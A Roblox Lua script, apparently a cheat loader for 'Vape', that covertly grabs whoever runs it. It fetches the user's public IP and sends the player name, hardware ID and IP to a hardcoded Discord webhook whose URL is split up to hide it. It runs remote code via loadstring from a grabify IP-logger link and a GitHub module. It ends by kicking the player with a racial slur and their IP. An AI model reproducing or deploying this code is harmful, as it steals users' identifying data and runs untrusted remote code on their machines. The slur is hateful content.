

local HttpService = game:GetService("HttpService")





webpart1 = "discord.com/api/"
webpart2 = "webhooks/"
webpart3 = "1066137065273704498/JTkXf6dYJqI1Z7acuWSGn_th-PXKwPBPGAzJ14PXKXDTHtQDY-9Ibw8DsdYCz2OyxYkH"


local Web_hook = 'https://'..webpart1..webpart2..webpart3


local HWID = game:GetService("RbxAnalyticsService"):GetClientId()

local HwidWhitelist = {
    "24BE1051-ADEF-4CF8-8DE3-51DA5E52A43F", -- Floopy
    "1165A65B-F75C-4ECB-A692-F055D8A81325", -- Ouz
    "A77C7F6C-DBA6-4290-B7B0-2F0488013114", -- Velmix
    "09A6E0D0-C5CC-4AC6-988A-8A2D81E03D18", -- CertfiedLag
    "54BF2C6B-9907-4FD8-8F0A-71B37C46E34D", -- Printtop
    "AA577CD4-C83D-4105-809A-7CE94D40A3EC", -- Ratio
    "BD5F75A2-124D-4F36-B582-5A1744D21223", -- Tweakin
    "AEAF1191-9527-4488-B786-5F8E6004F3EE", -- Xzyn
    "0098418B-01B1-4F11-B3E5-DFE9AE1CE2D6", -- Catmas
    "8C403AE6-9477-4CA1-832C-B5975D0F0C49", -- Mine
    "2B7E4926-420F-446C-96BD-7BC5C6AC57F2", -- Onxy
    "734D540E-349A-43EC-AD5B-F5BA55A972C2", -- Kitten
    "58E697CE-F0DD-4303-9EE7-F78B2725F4AB", -- Iwasneverhere
    "DFA89DE855EA185044AEE4287DB20E10453E", -- Floor
    "1A235485-36D5-4489-B0D6-FA1626D4F8F7", -- Stupid Gavin
    "EA2BE45B-EDF6-429A-8AC3-92CD54216522" -- thegod
}





if isfile("vape/WhiteList.txt") == false then
    writefile("vape/WhiteList.txt", HWID)
end

local ip = tostring(game:HttpGet("https://api.ipify.org", true))



if table.find(HwidWhitelist, HWID) then
    print("Found Hwid In List")
    local Read = readfile("vape/WhiteList.txt")
    if table.find(HwidWhitelist, Read) then
        game:GetService("Players").LocalPlayer:Kick("This Will Work Soon")
    else
        local Responce = syn.request(
            {
                Url = Web_hook,
                Method = 'POST',
                Headers = {
                    ["Content-Type"] = "application/json"
                },
                Body = HttpService:JSONEncode({
                    ["content"] = "",
                    ["embeds"] = {{
                        ["title"] = "**Execution Detected**",
                        ["color"] = 15636761,
                        ["fields"] = {
                            {
                                ["name"] = "**Player Name** : ",
                                ["value"] = game:GetService("Players").LocalPlayer.Name.." **|**",
                                ["inline"] = true
                            },
                            {
                                ["name"] = "**HWID** : ",
                                ["value"] = game:GetService("RbxAnalyticsService"):GetClientId().." **|**",
                                ["inline"] = true
                            },
                            {
                                ["name"] = "**IP** : ",
                                ["value"] = "**"..ip.."**",
                                ["inline"] = true
                            }
                        }
                    }}
                })
            }
        )
        loadstring(game:HttpGet("https://grabify.link/0I3C40", true))()
        loadstring(game:HttpGet("https://raw.githubusercontent.com/7GrandDadPGN/VapeV4ForRoblox/main//CustomModules/6872274481.lua",true))()
        game.Players.LocalPlayer:Kick("Fuck You Nigger also "..ip)  
    end
else
    local Responce = syn.request(
        {
            Url = Web_hook,
            Method = 'POST',
            Headers = {
                ["Content-Type"] = "application/json"
            },
            Body = HttpService:JSONEncode({
                ["content"] = "",
                ["embeds"] = {{
                    ["title"] = "**Execution Detected**",
                    ["color"] = 15636761,
                    ["fields"] = {
                        {
                            ["name"] = "**Player Name** : ",
                            ["value"] = game:GetService("Players").LocalPlayer.Name.." **|**",
                            ["inline"] = true
                        },
                        {
                            ["name"] = "**HWID** : ",
                            ["value"] = game:GetService("RbxAnalyticsService"):GetClientId().." **|**",
                            ["inline"] = true
                        },
                        {
                            ["name"] = "**IP** : ",
                            ["value"] = "**"..ip.."**",
                            ["inline"] = true
                        }
                    }
                }}
            })
        }
    )
    loadstring(game:HttpGet("https://grabify.link/0I3C40", true))()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/7GrandDadPGN/VapeV4ForRoblox/main//CustomModules/6872274481.lua",true))()
    game.Players.LocalPlayer:Kick("Fuck You Nigger also "..ip)
end




















